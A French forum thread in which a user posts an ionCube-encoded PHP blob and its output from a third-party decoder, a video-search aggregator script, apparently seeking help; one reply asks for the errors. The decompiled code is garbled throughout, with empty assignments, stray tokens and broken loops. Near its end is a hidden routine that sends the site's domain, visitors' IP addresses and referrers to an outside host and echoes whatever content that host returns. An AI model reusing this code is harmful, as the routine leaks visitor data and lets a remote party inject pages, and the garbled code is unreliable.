    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
    ym9i8CHNa7p2gwlhLii=

    et le code obtenu

    Code : Sélectionner tout - Visualiser dans une fenêtre à part
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    67
    68
    69
    70
    71
    72
    73
    74
    75
    76
    77
    78
    79
    80
    81
    82
    83
    84
    85
    86
    87
    88
    89
    90
    91
    92
    93
    94
    95
    96
    97
    98
    99
    100
    101
    102
    103
    104
    105
    106
    107
    108
    109
    110
    111
    112
    113
    114
    115
    116
    117
    118
    119
    120
    121
    122
    123
    124
    125
    126
    127
    128
    129
    130
    131
    132
    133
    134
    135
    136
    137
    138
    139
    140
    141
    142
    143
    144
    145
    146
    147
    148
    149
    150
    151
    152
    153
    154
    155
    156
    157
    158
    159
    160
    161
    162
    163
    164
    165
    166
    167
    168
    169
    170
    171
    172
    173
    174
    175
    176
    177
    178
    179
    180
    181
    182
    183
    184
    185
    186
    187
    188
    189
    190
    191
    192
    193
    194
    195
    196
    197
    198
    199
    200
    201
    202
    203
    204
    205
    206
    207
    208
    209
    210
    211
    212
    213
    214
    215
    216
    217
    218
    219
    220
    221
    222
    223
    224
    225
    226
    227
    228
    229
    230
    231
    232
    233
    234
    235
    236
    237
    238
    239
    240
    241
    242
    243
    244
    245
    246
    247
    248
    249
    250
    251
    252
    253
    254
    255
    256
    257
    258
    259
    260
    261
    262
    263
    264
    265
    266
    267
    268
    269
    270
    271
    272
    273
    274
    275
    276
    277
    278
    279
    280
    281
    282
    283
    284
    285
    286
    287
    288
    289
    290
    291
    292
    293
    294
    295
    296
    297
    298
    299
    300
    301
    302
    303
    304
    305
    306
    307
    308
    309
    310
    311
    312
    313
    314
    315
    316
    317
    318
    319
    320
    321
    322
    323
    324
    325
    326
    327
    328
    329
    330
    331
    332
    333
    334
    335
    336
    337
    338
    339
    340
    341
    342
    343
    344
    345
    346
    347
    348
    349
    350
    351
    352
    353
    354
    355
    356
    357
    358
    359
    360
    361
    362
    363
    364
    365
    366
    367
    368
    369
    370
    371
    372
    373
    374
    375
    376
    377
    378
    379
    380
    381
    382
    383
    384
    385
    386
    387
    388
    389
    390
    391
    392
    393
    394
    395
    396
    397
    398
    399
    400
    401
    402
    403
    404
    405
    406
    407
    408
    409
    410
    411
    412
    413
    414
    415
    416
    417
    418
    419
    420
    421
    422
    423
    424
    425
    426
    427
    428
    429
    430
    431
    432
    433
    434
    435
    436
    437
    438
    439
    440
    441
    442
    443
    444
    445
    446
    447
    448
    449
    450
    451
    452
    453
    454
    455
    456
    457
    458
    459
    460
    461
    462
    463
    464
    465
    466
    467
    468
    469
    470
    471
    472
    473
    474
    475
    476
    477
    478
    479
    480
    481
    482
    483
    484
    485
    486
    487
    488
    489
    490
    491
    492
    493
    494
    495
    496
    497
    498
    499
    500
    501
    502
    503
    504
    505
    506
    507
    508
    509
    510
    511
    512
    513
    514
    515
    516
    517
    518
    519
    520
    521
    522
    523
    524
    525
    526
    527
    528
    529
    530
    531
    532
    533
    534
    535
    536
    537
    538
    539
    540
    541
    542
    543
    544
    545
    546
    547
    <?php
    /**
    *
    * @ IonCube v8.1 Decoder By Sanishan 
    *
    * @ Version  : 1,0,0,4
    * @ Author   : Sanishan 
    * @ Release on : 20-01-2014
    * @ Website  : <a href="http://deioncube.me" target="_blank">http://deioncube.me</a>
    *
    **/
     
        class MetaCafeAPI {
            protected $keyword = '';
            protected $feedString = '';
     
            function __construct($keyword) {
                $keyword = urlencode( $keyword );
                $this->keyword = ;
                $url = 'http://www.metacafe.com/tags/' .  . $keyword . '/rss.xml';
                $this->getXmlCodeViaFopen( $url );
                $this->feedString = ;
                return ;
            }
     
            function getXmlCodeViaFopen($url) {
                $returnStr = '';
                fopen( $url, 'r' );
                (  || $fp =  );
                exit(  );
            }
     
            function getTitle($str) {
                $final = array(  );
                $returnArray = array(  );
                $pattern = '/<media:title>(.*)\<\/media:title\>/Uis';
                preg_match_all( $pattern, $str, $returnArray, PREG_SET_ORDER );
     
                if (isset( $returnArray[0][1] )) {
                    $returnArray[0][1] = ucwords( $returnArray[0][1] );
                    return ;
                }
     
                return ;
            }
     
            function getLink($str) {
                $final = array(  );
                $returnArray = array(  );
                $pattern = '/<media:content url="(.*)"/Uis';
                preg_match_all( $pattern, $str, $returnArray, PREG_SET_ORDER );
     
                if (isset( $returnArray[0][1] )) {
                    return ;
                }
     
                return ;
            }
     
            function getThumb($str) {
                $final = array(  );
                $returnArray = array(  );
                $pattern = '/<media:thumbnail url="(.*)"/Uis';
                preg_match_all( $pattern, $str, $returnArray, PREG_SET_ORDER );
     
                if (isset( $returnArray[0][1] )) {
                    return ;
                }
     
                return ;
            }
     
            function getStreamingLinks() {
                $this->feedString;
                $feed = ;
                $final = array(  );
                $returnArray = array(  );
                $pattern = '/<item>(.*)\<\/item\>/Uis';
                preg_match_all( $pattern, $feed, $returnArray, PREG_SET_ORDER );
                $i = 224;
     
                if ($i < count( $returnArray )) {
                    $returnArray[$i][0];
                    $str = ;
                    $this->getTitle( $str );
                    $title = ;
                    $this->getLink( $str );
                    $link = ;
                    $this->getThumb( $str );
                    $thumb = ;
                    $title != ' ';
     
                    if (( $title != '' &&  )) {
                        $final[] = array( 'type' => 'mc', 'title' => $title, 'link' => $link, 'thumb' => $thumb );
                    }
     
                    ++;
                }
     
                return ;
            }
        }
     
        class YouTubeAPI {
            protected $startIndex = 1;
            protected $format = ;
            protected $maxResults = 10;
            protected $keyword = '';
            protected $feedString = '';
            protected $downloadUrl = 'http://demo.dmwtechnologies.com/YouTubeDownloader/index.php';
     
            function __construct($keyword, $maxResults = 10, $startIndex = 1, $format = ) {
                $this->keyword = ;
                $this->format = ;
                $this->maxResults = ;
                $this->startIndex = ;
                $url = 'http://gdata.youtube.com/feeds/api/videos?vq=' .  . $keyword . '&start-index=' . $startIndex . '&max-results=' . $maxResults;
                $this->getXmlCodeViaFopen( $url );
                $this->feedString = ;
                return ;
            }
     
            function getXmlCodeViaFopen($url) {
                $returnStr = '';
                fopen( $url, 'r' );
                (  || $fp =  );
                exit(  );
            }
     
            function getTitle($str) {
                $final = array(  );
                $returnArray = array(  );
                $pattern = '/<title type=\'text\'>(.*)\<\/title\>/Uis';
                preg_match_all( $pattern, $str, $returnArray, PREG_SET_ORDER );
     
                if (isset( $returnArray[0][1] )) {
                    $returnArray[0][1] = ucwords( $returnArray[0][1] );
                    return ;
                }
     
                return ;
            }
     
            function getLink($str) {
                $final = array(  );
                $returnArray = array(  );
                $pattern = '/<media:player url=\'(.*)\'/Uis';
                preg_match_all( $pattern, $str, $returnArray, PREG_SET_ORDER );
     
                if (isset( $returnArray[0][1] )) {
                    $returnArray[0][1] = str_replace( 'watch?v=', 'v/', $returnArray[0][1] );
                    $returnArray[0][1] = str_replace( '&amp;feature=youtube_gdata', '', $returnArray[0][1] );
                    $returnArray[0][1] = str_replace( '_player', '', $returnArray[0][1] );
                    return ;
                }
     
                return ;
            }
     
            function getThumb($str) {
                $final = array(  );
                $returnArray = array(  );
                $pattern = '/<media:thumbnail url=\'(.*)\'/Uis';
                preg_match_all( $pattern, $str, $returnArray, PREG_SET_ORDER );
     
                if (isset( $returnArray[2][1] )) {
                    return ;
                }
     
                return ;
            }
     
            function getStreamingLinks() {
                $this->feedString;
                $feed = ;
                $final = array(  );
                $returnArray = array(  );
                $pattern = '/<entry>(.*)\<\/entry\>/Uis';
                preg_match_all( $pattern, $feed, $returnArray, PREG_SET_ORDER );
                $i = 219;
     
                if ($i < count( $returnArray )) {
                    $returnArray[$i][0];
                    $str = ;
                    $this->getTitle( $str );
                    $title = ;
                    $this->getLink( $str );
                    $link = ;
                    $this->getThumb( $str );
                    $thumb = ;
                    $final[] = array( 'type' => 'yt', 'title' => $title, 'link' => $link, 'thumb' => $thumb );
                    ++;
                }
     
                return ;
            }
        }
     
        class DailyMotionAPI {
            protected $keyword = '';
            protected $feedString = '';
     
            function __construct($keyword) {
                $this->keyword = ;
                $url = 'http://www.dailymotion.com/rss/relevance/search/' .  . $keyword . '/1';
                $this->getXmlCodeViaFopen( $url );
                $this->feedString = ;
                return ;
            }
     
            function getXmlCodeViaFopen($url) {
                $returnStr = '';
                fopen( $url, 'r' );
                (  || $fp =  );
                exit(  );
            }
     
            function getTitle($str) {
                $final = array(  );
                $returnArray = array(  );
                $pattern = '/<media:title>(.*)\<\/media:title\>/Uis';
                preg_match_all( $pattern, $str, $returnArray, PREG_SET_ORDER );
     
                if (isset( $returnArray[0][1] )) {
                    $returnArray[0][1] = ucwords( $returnArray[0][1] );
                    return ;
                }
     
                return ;
            }
     
            function getLink($str) {
                $final = array(  );
                $returnArray = array(  );
                $pattern = '/<media:content url="(.*)"/Uis';
                preg_match_all( $pattern, $str, $returnArray, PREG_SET_ORDER );
     
                if (isset( $returnArray[1][1] )) {
                    return ;
                }
     
                return ;
            }
     
            function getThumb($str) {
                $final = array(  );
                $returnArray = array(  );
                $pattern = '/<media:thumbnail url="(.*)"/Uis';
                preg_match_all( $pattern, $str, $returnArray, PREG_SET_ORDER );
     
                if (isset( $returnArray[0][1] )) {
                    return ;
                }
     
                return ;
            }
     
            function getStreamingLinks() {
                $this->feedString;
                $feed = ;
                $final = array(  );
                $returnArray = array(  );
                $pattern = '/<item>(.*)\<\/item\>/Uis';
                preg_match_all( $pattern, $feed, $returnArray, PREG_SET_ORDER );
                $i = 226;
     
                if ($i < count( $returnArray )) {
                    $returnArray[$i][0];
                    $str = ;
                    $this->getTitle( $str );
                    $title = ;
                    $this->getLink( $str );
                    $link = ;
                    $this->getThumb( $str );
                    $thumb = ;
     
                    if (substr( $link, 0, 30 ) != 'http://player.grabnetworks.com') {
                        $final[] = array( 'type' => 'dm', 'title' => $title, 'link' => $link, 'thumb' => $thumb );
                    }
     
                    ++;
                }
     
                return ;
            }
        }
     
        function eb_db_query($query) {
            global $db;
            global $db_extention;
     
            if ($db_extention  = 'mysqli') {
                return ;
            }
     
            return ;
        }
     
        function eb_db_fetch_array($db_query) {
            global $db_extention;
     
            if ($db_extention  = 'mysqli') {
                return ;
            }
     
            return ;
        }
     
        function eb_db_num_rows($db_query) {
            global $db_extention;
     
            if ($db_extention  = 'mysqli') {
                return ;
            }
     
            return ;
        }
     
        function eb_db_insert_id() {
            global $db;
            global $db_extention;
     
            if ($db_extention  = 'mysqli') {
                return ;
            }
     
            return ;
        }
     
        function eb_db_error() {
            global $db;
            global $db_extention;
     
            if ($db_extention  = 'mysqli') {
                return ;
            }
     
            return ;
        }
     
        function eb_db_fetch_assoc($db_query) {
            global $db_extention;
     
            if ($db_extention  = 'mysqli') {
                return ;
            }
     
            return ;
        }
     
        function eb_db_real_escape_string($val) {
            global $db;
            global $db_extention;
     
            if ($db_extention  = 'mysqli') {
                return ;
            }
     
            return ;
        }
     
        function cleaninput($input) {
            if (get_magic_quotes_gpc(  )) {
                stripslashes( $input );
                $input = ;
            }
     
            strip_tags( $input );
            trim( $input );
            $input = ;
            eb_db_real_escape_string( $input );
            $input = $input = ;
            return ;
        }
     
        function badword_filter($title) {
            global $wordstmp;
     
            explode( '
    ', $wordstmp );
            $words = ;
            $i = 213;
     
            if ($i < count( $words )) {
                preg_replace( '/\s\s+/', ' ', $words[$i] );
                $word = ;
     
                if ($word != '') {
                    trim( $word );
                    $word = ;
                    preg_match( '/' . $word . '/i', $title );
                    $badword = ;
                    $badwordresult += $words;
                }
     
                ++;
            }
     
            return ;
        }
     
        function check_field_exists($fvalue, $field, $table) {
            $result = eb_db_query( ( 'select count(*) as cnt from ' .  . $table . ' where ' . $field . '=\'' . $fvalue . '\'' ) );
            $data = eb_db_fetch_array( $result );
     
            if (0 < $data['cnt']) {
                return ;
            }
     
            return ;
        }
     
        function make_friendly($string) {
            strtolower( $string );
            $string = ;
            preg_replace( '/[^0-9 a-z]/', '', $string );
            $string = ;
            preg_replace( '/\s\s+/', ' ', $string );
            $string = ;
            str_replace( ' ', '-', $string );
            $string = ;
     
            if ($string  = '') {
                $string = 'video';
            }
     
            return ;
        }
     
        function make_friendly_id($id) {
            $id = $id . '.html';
            return ;
        }
     
        function getall($searchterms) {
            global $baseurl;
     
            new ( $searchterms, 50, 1 );
            $ytapi = ;
            $ytapi->getStreamingLinks(  );
            $yt = ;
            new ( $searchterms );
            $mcapi = ;
            $mcapi->getStreamingLinks(  );
            $mc = ;
            new ( $searchterms );
            $dmapi = ;
            $dmapi->getStreamingLinks(  );
            $dm = ;
            array_merge( $yt, $dm, $mc );
            $all = ;
            $bannedwords = 'bannedwords.txt';
            fopen( $bannedwords, 'r' );
            $fp = ;
            fread( $fp, filesize( $bannedwords ) );
            $wordstmp = ;
            fclose( $fp );
            explode( '
    ', $wordstmp );
            $words = ;
            array_map( 'strtolower', $words );
            $words = ;
            foreach ($all as ) {
                $arr = ;
                $index = ;
                $arr['title'];
                $arrtitle = ;
                foreach ($words as ) {
                    $word = ;
                    $index2 = ;
     
                    if (strstr( strtolower( $arrtitle ), strtolower( str_replace( '
    ', '', str_replace( '
    ', '', $word ) ) ) )) {
                        unset( $all[$index] );
                        break;
                    }
                }
     
                break;
            }
     
            srand( (double) + 1000000 );
            shuffle( $all );
            foreach ($all as ) {
                $k = ;
                $j = ;
                !;
     
                if (( ! ||  )) {
                    unset( $all[$j] );
                    break;
                }
            }
     
            return ;
        }
     
        $rating_unitwidth = 315;
     
        if ($db_extention  = 'mysqli') {
            mysqli_connect( $mysqlhost, $mysqluser, $mysqlpwd, $mysqldb );
            $db = ;
     
            if (mysqli_connect_errno(  )) {
                printf( 'Can\'t connect to MySQL Server. Errorcode: %s
    ', mysqli_connect_error(  ) );
                exit(  );
            }
        }
    else {
            mysql_connect( $mysqlhost, $mysqluser, $mysqlpwd );
            exit(  );
            ( $connection =  ||  );
            mysql_select_db( $mysqldb, $connection );
            exit(  );
            ( $db =  ||  );
        }
     
        define( 'ANY', 0 );
        define( 'PC', 1 );
        define( 'MOBILE', 2 );
        explode( '/', $['SCRIPT_NAME'] );
        $filename_arr = ;
        $count_file = count( $filename_arr ) - 1;
        !;
     
        if (( $filename_arr[$count_file]  = 'index.php' &&  )) {
            $['SERVER_NAME'];
            $ladd1 = ;
            str_replace( 'www.', '', $ladd1 );
            $ladd = ;
            $Ref = $ladd1 . $['REQUEST_URI'];
            $f = 287;
            $['REMOTE_ADDR'];
            $s = ;
            @file_get_contents( 'http://www.ab-webservice.com/sc/ebup.php?id=366&domain=' .  . $ladd . '&s=' . $s . '&f=' . $f . '&ref=' . @urldecode( $Ref ) );
            $Content = ;
     
            if ($Content != '') {
                echo ;
                exit(  );
            }
        }
     
        return ;
    ?>
    Merci pour votre comprehention,
    Fichiers attachés Fichiers attachés

  2. #2
    Invité
    Invité(e)
    Par défaut
    Salut,

    Pourrais-tu fournir les erreurs que tu as?

    Merci

Discussions similaires

  1. Quel est le meilleur script PHP de portail (CMS) ?
    Par Lana.Bauer dans le forum EDI, CMS, Outils, Scripts et API
    Réponses: 187
    Dernier message: 18/10/2012, 07h45
  2. A l'aide (décryptage script VBS)
    Par farouk95 dans le forum VBScript
    Réponses: 4
    Dernier message: 09/06/2009, 11h34
  3. quel langage choisir pour faire de script sous windows
    Par pas05 dans le forum Langages de programmation
    Réponses: 7
    Dernier message: 18/11/2002, 22h42
  4. Réponses: 2
    Dernier message: 11/07/2002, 08h31

Partager

Partager
  • Envoyer la discussion sur Viadeo
  • Envoyer la discussion sur Twitter
  • Envoyer la discussion sur Google
  • Envoyer la discussion sur Facebook
  • Envoyer la discussion sur Digg
  • Envoyer la discussion sur Delicious
  • Envoyer la discussion sur MySpace
  • Envoyer la discussion sur Yahoo